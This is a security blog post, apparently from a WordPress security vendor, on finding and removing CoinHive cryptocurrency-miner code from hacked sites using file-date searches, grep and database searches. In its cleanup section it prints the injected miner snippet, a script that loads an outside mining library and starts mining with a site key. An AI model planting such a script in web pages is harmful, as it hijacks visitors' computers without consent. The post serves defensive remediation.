Back
Coinhive script clean up from hacked website

How To Clean Up CoinHive Miner Code From The Hacked WordPress Website?

We have noticed that a massive number of hacked WordPress websites are used for Monero cryptocurrency mining. Hackers use CoinHive – a Monero cryptocurrency mining program written in the JavaScript programming language. When embedded into your site, this program mines cryptocurrency by borrowing your website visitors’ computer resources. If you have noticed this, we recommend to perform steps outlined below and clear CoinHive mining code from your website.

Identify modified files

The first thing to do is to identify which files have been changed. You can do this in several ways:

  • Connect to the server (if it is possible). Use command “$ find ./ -type f -mtime -10”, where -10 means day interval.
  • Use the FileZilla program. First, choose Server -> Search remote files… In the window that opens, select search conditions -> date, after, and enter the date, e.g. 10 days earlier than today.
  • Refer to the hosting. If you can’t access your server, you can try to contact your hosting administrator and request a help.

If you do not find any modified files, it is possible that the CoinHive mining code is loaded into the database. In this case, you should look up for “CoinHive” keyword in your database table. If you have access to phpMyAdmin, use the Search tool or try to search using SQL LIKE request for connecting to the server.

View modified files

There should be CoinHive code in the modified files. If all the files look clean, then try searching for a “coinhive” keyword in all the website files. How to do this:

  • If you have access to the server, use the following command: grep -rnw '/' -e 'coinhive'
  • If you are not able to access the server, you can use a code editor such as Notepad ++. Select “Search text string in all files and folders” and start searching.

Clean up CoinHive code

Code example:

<script src='https://coinhive.com/lib/coinhive.min.js' type='text/javascript'></script>
<script>var miner = new CoinHive.Anonymous('TnKJQivLdI92CHM5VDumyS'); miner.start();</script>

Remember that this part of the CoinHive JavaScript miner code TnKJQivLdI92CHM5VDumyS is used to identify the user of the script and may vary. You can also take a look at our removal guide here: How To Clean A Hacked WordPress Site On Your Own

Reduce the risk so that it does not happen again

Change your hosting, database and FTP passwords. Change passwords for all users, make sure all the passwords are strong. Renew WordPress and all plugins, make sure all plugins you use do not have security holes – use our database.

Rasa A.

Similar Posts

Flagged Website - Google Safe Browsing

What To Do If Your Website Is Flagged For Malware By Google

Google is very pro-active when it comes to protecting the safety of their customers. They scan millions of websites each day, looking for ...

WordPress vulnerability that allows file deletion

Latest WordPress vulnerability disclosed and it poses a danger to all versions including 4.9.6

Yesterday a security research team from RIPSTECH disclosed WordPress vulnerability that affects all latest WordPress versions including the ...

SEO spam on hacked WordPress sites

What Is SEO Spam And How Can It Hurt Your WordPress Site

Almost half of all malware attacks against websites involve SEO spam. This type of attack is performed by Black Hat SEO’s and hackers ...

Leave a Reply

Your email address will not be published. Required fields are marked *